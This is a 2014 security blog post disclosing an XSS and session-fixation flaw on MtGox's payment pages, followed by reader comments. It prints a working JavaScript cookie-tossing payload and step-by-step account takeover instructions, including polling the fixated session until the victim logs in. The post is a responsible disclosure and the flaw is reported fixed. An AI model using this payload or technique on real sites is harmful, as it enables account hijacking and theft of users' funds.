Tuesday, January 14, 2014

Account hijacking on MtGox

If it wasn't MtGox I wouldn't even mention it — XSS/fixation/etc are web sec routines, and are not worth a blog post.

But it *is* MtGox. When I started checking bitcoin-related websites it was my target #1. First XSS was found in 5 minutes on payments.mtgox.com, few mins later I discovered session fixation leading to account takeover. Long story short, here's exploit:

name='document.cookie="SESSION_ID=SID; Domain=.mtgox.com; Path=/code"';
location='https://payment.mtgox.com/38131846-a564-487c-abfb-6c5be47bce27/e6325160-7d49-4a69-b40f-42bb3d2f7b91?payment[cancel]=cancel';

1. Create Checkout button https://www.mtgox.com/merchant/checkout and set Cancel URL to javascript:eval(name);

2. Put your payload in window.name and redirect to "https://payment.mtgox.com/38131846-a564-487c-abfb-6c5be47bce27/e6325160-7d49-4a69-b40f-42bb3d2f7b91?payment[cancel]=cancel" (GET-accessible action). MtGox has X-Frame-Options so it won't work in iframe.

3. User is supposed to wait 5 seconds until setTimeout in JS assigns location to our javascript: URL.

4. Get some guest SID with server side and fixate it using this XSS. It's called Cookie tossing, and our cookie shadows original SESSION_ID because more specific Path-s are sent first.
  document.cookie="SESSION_ID=SID; Domain=.mtgox.com; Path=/code"

5. Close the window.

6. Someday user logs in, and his session will stay the same SID. Your server script should run cron task every 5 minutes, checking if SID is still "guest". As soon as user signs in you can use fixated SID to perform any actions on behalf of his account - "Session riding".

Timeline
Jan 11 - vuln reported
Jan 14 - vuln accepted and fixed in 3 hours. 

FYI use nils@tibanne.com as "security@mtgox.com" (MtGox doesn't have neither bounty program nor email for reports). 


Recap:
Even top-notch bitcoin websites are not as secure as payment providers should be. This vulnerability is really easy to find, so I suspect it's been used in the wild. Use 2 factor auth.

In no time bitcoin currency got some good value, but security level of bitcoin websites didn't play along. 

11 comments:

  1. Thank you for helping the community. I hope you got a reward/bounty?

    ReplyDelete
  2. Might be worth putting a bitcoin address on this blog post and accepting donations - I bet more than a few people would throw you some beer money just as a thankyou.

    ReplyDelete
    Replies
    1. You can use the Dogecoin twitter bot to tip him @homakov. Convert BTC to DOGE and use the instructions here: https://twitter.com/tipdoge

      Delete
    2. Or just use tippercoin.com?

      Delete
    3. I'd personally be insulted if someone sent me a dogecoin tip. So idiot. Wow.

      Delete
  3. Was this due to the cookies not being set as http only on mtgox?

    ReplyDelete
    Replies
    1. no, current cookies don't matter, i *replaced* them with my value = fixated

      Delete
  4. Hey Egor, good post. Maybe the main reason I go to Hacker News is to find blogs of experts who are also good writers, inventive and with some panache to add to my top shelf rss pile. Yours is now among them. Keep it up please.

    ReplyDelete
  5. "Top notch" sites like Gox. Lol

    ReplyDelete
    Replies
    1. top shelf sites, man, top tier

      you don't get more top than the "Magic: The Gathering Oonline" eXchange

      Delete